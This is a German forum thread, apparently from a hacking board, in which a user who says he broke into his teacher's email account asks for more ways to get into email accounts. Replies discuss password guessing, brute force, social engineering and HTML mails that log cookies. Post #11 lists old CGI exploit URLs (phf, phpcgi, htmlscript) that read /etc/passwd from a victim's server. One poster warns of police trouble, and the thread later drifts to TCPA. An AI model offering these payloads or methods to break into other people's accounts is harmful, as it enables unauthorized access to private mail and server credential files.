Emailaccount Account Passwort herausfinden

#1 hi @all

hab vor kurzem e-mail account vom lehrer meiner schule gehackt
ich kenne 3 möglichkeiten email-acc zu hacken :
- raten, also soviel raus kriegen über die bestimmte person und dann raten
(mein lehrer hatte z.b. sein vornamen genommen, und den wuuste jeder
in der schule !)
- brute force
- auf e-mail server einhacken , passwd suchen(oder erstmal superuser werden)und saugen, wenn verschlüsselt brute force

>> so jetzt wollte ich fragen, welche möglichkeiten es noch gibt
>wenn ihr wollt das dies anleitungen script kiddies zunutze sein könnte,
dann mailt mir einfach

tnx im voraus
cu @all

<[EFH]> rockz
__________
Nichts ist so wie es scheint.

#2 Hi Gatez,

erstmal empfehle ich Dir die Forenregeln zu lesen, damit ich deine Threadtitel nicht nachbearbeiten muss!

- Social Hacking ist eine Sache!
- gegen Brute Force sind die meisten (auch Web.de) gesichert, d.h. nach 3 falschen Anfragen gibts erstmal ein Timeout, wo man nicht mehr weiter brute forcen kann!
- e-mail server hacken ist auch eine Sache die sich als recht schwer herausstellt und die bisher noch keiner bei Web.de geschafft hat.
- eine weitere Möglichkeit kenne ich noch mit einer präperierten Email (Webbugs & Scripts), die ich hier schonmal irgendwo im Board erläutert habe.
(nur theoretisch und zum aufdecken von Sicherheitslücken!)
__________
Gruß Lukas

#3 hi lukas

sorry hab rules noch nicht gelesen
bin neu hier

also gibt es nur noch die möglichkeit , das mit den cgi-bugs und so

cu8tr
gatez
__________
Nichts ist so wie es scheint.

#4 da müsstest du mir mehr berichten, eine Sicherheitslücke da ist mir nicht bekannt!

Ich dachte eher daran per HTML Email z.B. bei Yahoo Cookies + Referrer zu loggen!
__________
Gruß Lukas

#5 nächste woche oder so , sende ich dir die details, ok?
damit saugst du die pw-file vom server

cu
gatez
__________
Nichts ist so wie es scheint.

#6 ich habe das gefühl, das gatez hier von ftp servern spricht, wenn er eine "passwd" sucht oder von einem cgi bug spricht. diesen bug gibt es aber afaik nur in alten implementationen. darüber hinaus glaube ich nicht, dass man bei großen Freemailern mit klassischen ftp hacks rein kommt.

#7 Ein Tipp an alle dies probieren wollen,
LASSST das vorallem das in en E-Mail Server reinhacken...
Das geht ersten schwer und zweitens hat man ganz schnell die Poliezi am Hals...
Auch wenn ma nur en paar lange Portscanns macht...
und dann darauf connecten will.
Außerdem sollte man wenn schon en Shell-Account haben um dann die Unix-Befehle
darauf laufen zu lassen.
Also Ich warne alle die so was machen wollen.....
MFG
DAFRA

#8 @Lukas
- eine weitere Möglichkeit kenne ich noch mit einer präperierten Email (Webbugs & Scripts), die ich hier schonmal irgendwo im Board erläutert habe.
(nur theoretisch und zum aufdecken von Sicherheitslücken!)

Du bist mir immer noch eine Antwort schuldig. Da Web.de und Yahoo im Webmail kein Html anzeigen funktioniert es nicht. Bei anderen Anbietern oder Foren würde es
vielleicht funktionieren

@gatez
auf e-mail server einhacken , passwd suchen(oder erstmal superuser werden)und saugen, wenn verschlüsselt brute force

Das würde dir wenig bringen das Passwort existiert meist nur als Md5 hash. Du "kannst" es wie gesagt über Bruteforce knacken. Aber ob du weit über 100 Jahre alt wirst ist fraglich
__________
°<- Vorsicht Trollköder und Trollfalle -> {_}

#9

Zitat

spunki postete
@Lukas
- eine weitere Möglichkeit kenne ich noch mit einer präperierten Email (Webbugs & Scripts), die ich hier schonmal irgendwo im Board erläutert habe.
(nur theoretisch und zum aufdecken von Sicherheitslücken!)

Du bist mir immer noch eine Antwort schuldig. Da Web.de und Yahoo im Webmail kein Html anzeigen funktioniert es nicht. Bei anderen Anbietern oder Foren würde es
vielleicht funktionieren

Dies ist eine Reine Einstellungssache. Du hast die Möglichkeit mit oder ohne HTML deine Mails anzeigen zu lassen.

mfg p2k
__________
http://linux.regionnet.de/ - http://www.pf-lug.de/ - http://www.4logistic.de/ - http://www.pfenz.de

#10 hi @all

sehr interessant was ihr da geschrieben habt
das stimmt mit den ftp-server
man muss sich beim pop3- oder smtp-server einloggen und dort die mails abfangen, aber ich werde es nicht machen (hab früher gehackt,vielgelernt und zugegebn, ärger bekommen wie sau),
doch man muss beide seiten kennen, oder?
nur dann kann man sicherheitslücken aufdecken und schließen

cu @all
__________
Nichts ist so wie es scheint.

#11 hier sind mal die bugs :

php bug : http://vitimsdomain/cgi-bin/phpcgi?/etc/passwd
phf bug : http://vitimsdomain/cgi-bin/phf?Qalias=x%Oa/bin/cat% 20/etc/passwd
html bug: http://vitimsdomain/cgi-bin/htmlscript?/etc/passwd

-anstatt passwd ist dann shadow (glaub ich mal) gültig
-cgi bugs sind fehler im cgi-script (für neue, shit bin auch einer,egal)

> bei fehlern bitte message schicken

cu @all
__________
Nichts ist so wie es scheint.

#12 question :

wie kriege ich das weg, das das keine links sind (es sind ja schließlich keine)

... beim phf bug gehört """"" 20/etc/passwd """" noch da ran
ok ,das wars


cu
__________
Nichts ist so wie es scheint.

#13 es fehlt die Topleveldomain in allen links
__________
°<- Vorsicht Trollköder und Trollfalle -> {_}

#14 hi spunki

tnx
...
wieso findest du eigentlich tcpa gut ? klar wegen der sicherheit
ich werde das auf jeden fall ablöten
alles was du machst wird microsoft gemeldet, ms will jedes mal nach hause telefonieren.
was nicht von den tcpa-firmen ist , ist illegal
kopiergeschütztes brennen nicht mehr möglic !

cu8tr
__________
Nichts ist so wie es scheint.

#15 @gatez:
Falscher Thread! Mach bitte einen euen auf wenn du weiter über das Thema diskutieren willst. Und informier dich erst mal, du reagierst ziemlich paranoid.

Ich wollte Spunki auch schonmal deswegen ansprechen, aber hab inzwischen eingesehen das TCPA als Konzept durchaus brauchbar ist. Was kritisch wird ist das dazugehörige Microsoft-Betriebssystem. Solange es das noch nicht gibt sind alle DRM und Co. Befürchtungen reine Spekulation.
__________
Bitte keine Anfragen per PM, diese werden nicht beantwortet.